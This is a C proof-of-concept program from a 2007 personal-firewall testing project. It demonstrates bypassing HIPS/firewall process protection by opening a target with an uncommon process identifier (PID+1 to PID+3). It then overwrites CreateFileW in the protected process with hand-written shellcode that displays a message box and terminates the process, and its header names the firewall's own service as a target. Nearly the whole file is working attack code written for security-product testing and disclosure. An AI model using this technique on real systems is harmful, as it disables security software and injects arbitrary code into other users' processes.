/*

 Testing program for Bypassing PFW/HIPS open process control with uncommon identifier (BTP00002P005CF)
 

 Usage:
 prog PID
   PID - process identifier - number (divisible by four) that uniquely identifies every running process

 Description:
 This program tries to terminate the process specified by the given PID. However, CPF restricts calls 
 to TerminateProcess and other API that can be used for this purpose. This is why we use VirtualQueryEx, 
 VirtualProtectEx and WriteProcessMemory function to rewrite code of CreateFileW API function in its memory. 
 There is no limitation to CreateFileW, other API functions would also work. VirtualQueryEx, VirtualProtectEx 
 and WriteProcessMemory require a handle to the target process. This handle is obtained by the OpenProcess call 
 where the process identifier is set to PID+1, PID+2, or PID+3. If the memory of the target process is 
 changed, the program reports success. Before the target process terminates it displays a message 
 as a proof we can perform arbitrary action in the target process.

 Test:
 Running the testing program with the identifier of an arbitrary protected process as an argument. 
 Then making the target process call CreateFileW. In case we want to kill "cmdagent.exe", the main service 
 of CPF, it is enough to try to access the Internet with an unknown application.

*/

#include <stdio.h>
#include <windows.h>

void about(void)
{
  printf("Testing program for Bypassing PFW/HIPS open process control with uncommon identifier (BTP00002P005CF)\n");
  printf("Windows Personal Firewall analysis project\n");
  printf("Copyright 2007 by Matousec - Transparent security\n");
  printf("http://www.matousec.com/""\n\n");
  return;
}

void usage(void)
{
  printf("Usage: test PID\n"
         "  PID - process identifier\n");
  return;
}

void print_last_error(void)
{
  LPTSTR buf;
  DWORD code=GetLastError();
  if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,code,0,(LPTSTR)&buf,0,NULL))
  {
    fprintf(stderr,"Error code: %ld\n",code);
    fprintf(stderr,"Error message: %s",buf);
    LocalFree(buf);
  } else fprintf(stderr,"Unable to format error message for code %ld.\n",code);
  return;
}

/*
 enable_privilege adds privilege to own token
 returns TRUE if succeed
*/

int enable_privilege(char *priv_name)
{
  DWORD res=0;
  HANDLE tok;
  LUID luid;
  TOKEN_PRIVILEGES privs;

  if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&tok)) return 0;
  if (LookupPrivilegeValue(NULL,priv_name,&luid))
  {
    privs.PrivilegeCount=1;
    privs.Privileges[0].Luid=luid;
    privs.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
    DWORD ret_len;
    res=AdjustTokenPrivileges(tok,0,&privs,sizeof(TOKEN_PRIVILEGES),NULL,&ret_len);
    CloseHandle(tok);
  }
  return res;
}


/*
 enable_debug_privilege adds debug privilege to own token
 returns TRUE if succeed
*/

int enable_debug_privilege(void)
{
  return enable_privilege(SE_DEBUG_NAME);
}




int main(int argc,char **argv)
{
  about();
  enable_debug_privilege();

  ULONG pid;
  if ((argc!=2) || (!(pid=strtol(argv[1],NULL,10))))
  {
    usage();
    return 1;
  }


  PVOID msga_addr=(PVOID)GetProcAddress(LoadLibrary("user32"),"MessageBoxA");
  if (!msga_addr)
  {
    fprintf(stderr,"Unable to find MessageBoxA in user32.dll.\n");
    print_last_error();
    printf("\nTEST FAILED!\n");
    return 1;
  }

  printf("MessageBoxA found at 0x%p.\n",msga_addr);

  PVOID exit_addr=(PVOID)GetProcAddress(LoadLibrary("kernel32"),"ExitProcess");
  if (!exit_addr)
  {
    fprintf(stderr,"Unable to find ExitProcess in kernel32.dll.\n");
    print_last_error();
    printf("\nTEST FAILED!\n");
    return 1;
  }

  printf("ExitProcess found at 0x%p.\n",exit_addr);

  PVOID cfw_addr=(PVOID)GetProcAddress(GetModuleHandle("kernel32"),"CreateFileW");
  if (!cfw_addr)
  {
    fprintf(stderr,"Unable to find CreateFileW in kernel32.dll.\n");
    print_last_error();
    printf("\nTEST FAILED!\n");
    return 1;
  }

  printf("CreateFileW found at 0x%p.\n",cfw_addr);

  char payload[]="\x6A\x00"                                             // push MB_OK
                 "\x68\x78\x56\x34\x12"                                 // push 0x12345678      -> lpCaption
                 "\x68\x78\x56\x34\x12"                                 // push 0x12345678      -> lpText
                 "\x6A\x00"                                             // push NULL            
                 "\xFF\x15\x78\x56\x34\x12"                             // call [0x12345678] -> MessageBoxA
                 "\x6A\x00"                                             // push NULL
                 "\xFF\x15\x78\x56\x34\x12"                             // call [0x12345678] -> ExitProcess
                 "\x12\x34\x56\x78"                                     // address of MessageBoxA
                 "\x12\x34\x56\x78"                                     // address of ExitProcess
                 "BUG\0"                                                // lpCaption
                 "Message box from inside of the target process\0";     // lpText

  *(PVOID*)&payload[3]=(PVOID)((size_t)cfw_addr+36);
  *(PVOID*)&payload[8]=(PVOID)((size_t)cfw_addr+40);
  *(PVOID*)&payload[16]=(PVOID)((size_t)cfw_addr+28);
  *(PVOID*)&payload[24]=(PVOID)((size_t)cfw_addr+32);
  *(PVOID*)&payload[28]=msga_addr;
  *(PVOID*)&payload[32]=exit_addr;

  int result=FALSE;
  for (int i=1;i<4;i++)
  {
    pid++;
    printf("Opening process using identifier PID+%d=%ld with PROCESS_ALL_ACCESS access rights.\n",i,pid);
    HANDLE proc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,pid);
    if (proc)
    {
      printf("Process opened: handle = 0x%p\n",proc);

      MEMORY_BASIC_INFORMATION mbi;  
      if (VirtualQueryEx(proc,cfw_addr,&mbi,sizeof(mbi))==sizeof(mbi))
      {
        printf("Region starts at 0x%p, its size is 0x%lX.\n",mbi.BaseAddress,mbi.RegionSize);

        DWORD oldprotect;
        if (VirtualProtectEx(proc,mbi.BaseAddress,mbi.RegionSize,PAGE_EXECUTE_READWRITE,&oldprotect))
        {
          printf("Memory protection for range 0x%p - 0x%p changed.\n",mbi.BaseAddress,(PVOID)((size_t)mbi.BaseAddress+mbi.RegionSize));
          DWORD wbytes;
          if (WriteProcessMemory(proc,cfw_addr,payload,86,&wbytes))
          {
            printf("Memory changed at 0x%p.\n",cfw_addr);
            result=TRUE;
            break;
          } else
          {
            fprintf(stderr,"Unable to write 86 bytes to target process memory at 0x%p.\n",cfw_addr);
            print_last_error();
            fprintf(stderr,"\n");
          }

        } else
        {
          fprintf(stderr,"Unable to change page protection for range 0x%p - 0x%p.\n",mbi.BaseAddress,(PVOID)((size_t)mbi.BaseAddress+mbi.RegionSize));
          print_last_error();
          fprintf(stderr,"\n");
        }
      } else 
      {
        fprintf(stderr,"Unable to query memory at 0x%p.\n",cfw_addr);
        print_last_error();
        fprintf(stderr,"\n");
      }
      CloseHandle(proc);
    } else
    {
      fprintf(stderr,"Unable to open process PID = %ld.\n",pid);
      print_last_error();
      fprintf(stderr,"\n");
    }
  }

  result ? printf("\nTEST SUCCESSFUL!\n") : printf("\nTEST FAILED!\n");
  return result ? 0 : 1;
}
